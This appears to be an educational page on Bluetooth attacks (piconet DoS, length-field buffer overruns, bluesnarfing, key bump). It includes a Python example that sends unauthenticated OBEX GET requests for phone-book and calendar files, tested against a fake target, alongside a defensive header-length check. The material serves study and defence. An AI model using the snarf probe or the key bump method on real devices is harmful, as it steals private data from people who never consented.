Hacking Bluetooth

Bluetooth Attacks
Bluetooth attacks have become more common as the technology has gained popularity. The three best known are denial of service (DoS), bluesnarfing, and the key bump attack (often called BlueBump). The key bump attack abuses link key regeneration so that the attacker keeps a valid pairing, and with it full access to the victim's services, after the victim believes the pairing has been removed. One Bluetooth DoS attack involves a device that is not part of a piconet disrupting the established piconet of other devices. A Bluetooth piconet is the ad hoc network formed by two or more Bluetooth devices: one master and up to seven active slaves.

The attacking device, which is not participating in the piconet, spoofs the device address of a slave that is already in the piconet and then contacts the master. The master now has two devices claiming one slave's identity, which confuses it and disrupts the piconet. Another DoS attack on Bluetooth devices relies on a buffer overrun: data is copied into a buffer, but the amount copied exceeds the size of the buffer, so the excess is written into adjacent memory it was never intended to reach. The resulting state of the system depends on what that memory held; typically the Bluetooth stack or the whole device crashes or resets, and in the worst case the overwritten memory lets the attacker run code. A common trigger is a packet whose declared length field disagrees with the data actually sent, so any Bluetooth stack that trusts a length field without checking it against the bytes received is a candidate.

Bluesnarfing means an attacker has retrieved information from a device over a Bluetooth connection without authorization. The Object Exchange (OBEX) Push Profile (OPP) is the easy mechanism devices use to exchange business cards, calendar entries, and similar items, and in most cases it requires neither authentication nor pairing. Bluesnarfing consists of connecting to the OBEX Push target and, instead of pushing an object, issuing OBEX GET requests for well-known filenames such as telecom/pb.vcf (the phone book) and telecom/cal.vcs (the calendar). A correctly implemented Push service accepts only PUT; whether a GET is honoured depends on the victim device's firmware, and on affected devices the attacker receives every file requested.
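The OBEX exchange described above, together with the length check that the buffer overrun paragraph calls for, as an added example that is not part of the original page. The OBEX framing follows the public OBEX specification; FakePushTarget is a constructed stand-in for a phone whose Push service answers GET without authentication, so the script runs offline, and MALFORMED_RESPONSE is a constructed packet whose Name header claims more bytes than the packet contains. On a real target the transport would be an RFCOMM socket to the OBEX Push channel found by an SDP lookup, and real responses may arrive in several Continue (0x90) packets; both are left out here.

```python
"""OBEX Push probe in the bluesnarf style, with strict header length checks.
Added example, not code from the original page. FakePushTarget and
MALFORMED_RESPONSE are constructed test data; the real RFCOMM transport
is not included, so everything here runs offline."""
import struct

OP_CONNECT, OP_GET_FINAL = 0x80, 0x83        # request opcodes (final bit set)
RSP_OK, RSP_NOT_FOUND = 0xA0, 0xC4           # response codes (final bit set)
HDR_NAME, HDR_BODY, HDR_END_OF_BODY = 0x01, 0x48, 0x49
# Names that affected firmware served over OBEX Push: phone book and calendar.
KNOWN_FILES = ["telecom/pb.vcf", "telecom/cal.vcs"]
# Constructed: 8-byte response whose Name header declares 0x7FFF bytes.
MALFORMED_RESPONSE = bytes([RSP_OK, 0x00, 0x08, HDR_NAME, 0x7F, 0xFF, 0x00, 0x41])

def name_header(name):
    data = (name + "\x00").encode("utf-16-be")          # UTF-16BE, null terminated
    return struct.pack(">BH", HDR_NAME, 3 + len(data)) + data   # id, total length, value

def build_connect(max_len=0x2000):
    body = struct.pack(">BBH", 0x10, 0x00, max_len)      # OBEX 1.0, flags, max packet
    return struct.pack(">BH", OP_CONNECT, 3 + len(body)) + body

def build_get(name):
    hdr = name_header(name)
    return struct.pack(">BH", OP_GET_FINAL, 3 + len(hdr)) + hdr

def parse_headers(payload):
    """Return [(id, value)], refusing any header whose length overruns the packet.
    A stack that trusts the declared length here is the buffer overrun case."""
    headers, i, n = [], 0, len(payload)
    while i < n:
        hid = payload[i]
        if (hid & 0xC0) in (0x00, 0x40):                 # unicode / byte sequence
            if i + 3 > n:
                raise ValueError("truncated header length field")
            hlen = struct.unpack(">H", payload[i + 1:i + 3])[0]
            if hlen < 3 or i + hlen > n:
                raise ValueError("header length %d overruns packet" % hlen)
            headers.append((hid, payload[i + 3:i + hlen]))
            i += hlen
        else:                                            # 1-byte or 4-byte value
            size = 2 if (hid & 0xC0) == 0x80 else 5
            if i + size > n:
                raise ValueError("truncated fixed-size header")
            headers.append((hid, payload[i + 1:i + size]))
            i += size
    return headers

def parse_response(pkt, connect=False):
    """Split a response into (code, headers); CONNECT replies carry 4 extra bytes."""
    if len(pkt) < 3:
        raise ValueError("short packet")
    code, length = struct.unpack(">BH", pkt[:3])
    if length != len(pkt):
        raise ValueError("declared length %d != actual %d" % (length, len(pkt)))
    return code, parse_headers(pkt[7:] if connect else pkt[3:])

def is_malformed(pkt):
    try:
        parse_response(pkt)
        return False
    except ValueError:
        return True

def snarf(transport, names=KNOWN_FILES):
    """CONNECT without authentication, then GET each known name; returns {name: bytes}."""
    code, _ = parse_response(transport.request(build_connect()), connect=True)
    if code != RSP_OK:
        return {}
    got = {}
    for name in names:
        code, headers = parse_response(transport.request(build_get(name)))
        if code == RSP_OK:        # firmware honoured GET on the Push service
            got[name] = b"".join(v for h, v in headers if h in (HDR_BODY, HDR_END_OF_BODY))
    return got

class FakePushTarget:
    """Constructed vulnerable phone: serves the files it has, Not Found for the rest."""
    def __init__(self, files):
        self.files = files

    def request(self, pkt):
        if pkt[0] == OP_CONNECT:
            return struct.pack(">BHBBH", RSP_OK, 7, 0x10, 0x00, 0x2000)
        raw = dict(parse_headers(pkt[3:])).get(HDR_NAME, b"")
        name = raw.decode("utf-16-be").rstrip("\x00")
        if pkt[0] == OP_GET_FINAL and name in self.files:
            body = struct.pack(">BH", HDR_END_OF_BODY, 3 + len(self.files[name])) + self.files[name]
            return struct.pack(">BH", RSP_OK, 3 + len(body)) + body
        return struct.pack(">BH", RSP_NOT_FOUND, 3)

if __name__ == "__main__":
    phone = FakePushTarget({"telecom/pb.vcf": b"BEGIN:VCARD\r\nEND:VCARD\r\n"})
    print(snarf(phone))                      # {'telecom/pb.vcf': b'BEGIN:VCARD\r\nEND:VCARD\r\n'}
    print(is_malformed(MALFORMED_RESPONSE))  # True
```

The point of parse_headers is the check a robust stack makes and a vulnerable one skips: the 2-byte length inside a Name or Body header is attacker controlled, and copying that many bytes without comparing it to the bytes actually received is exactly the overrun the DoS paragraph describes. The snarf loop shows why an unauthenticated Push service is dangerous only if its firmware answers GET: a correct implementation returns an error for every name and the dictionary stays empty.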

In the key bump attack the attacker first gets the victim to accept a connection for some trivial data transfer, such as a picture, a calendar entry, or a business card on a PDA, which establishes a pairing between the two devices. After the data is sent, the attacker keeps the connection open and waits for, or persuades, the victim to delete the pairing. Because the connection is still up, the attacker can then request a link key regeneration, and the victim's device regenerates the key without prompting the user. The attacker now holds a valid link key that no longer appears in the victim's list of paired devices, and has full access to any services the victim's device provides. A device is not exposed if it drops the connection when a pairing is deleted and refuses key regeneration on a link whose pairing is gone; a user who has just deleted a pairing should check that no connection remains open.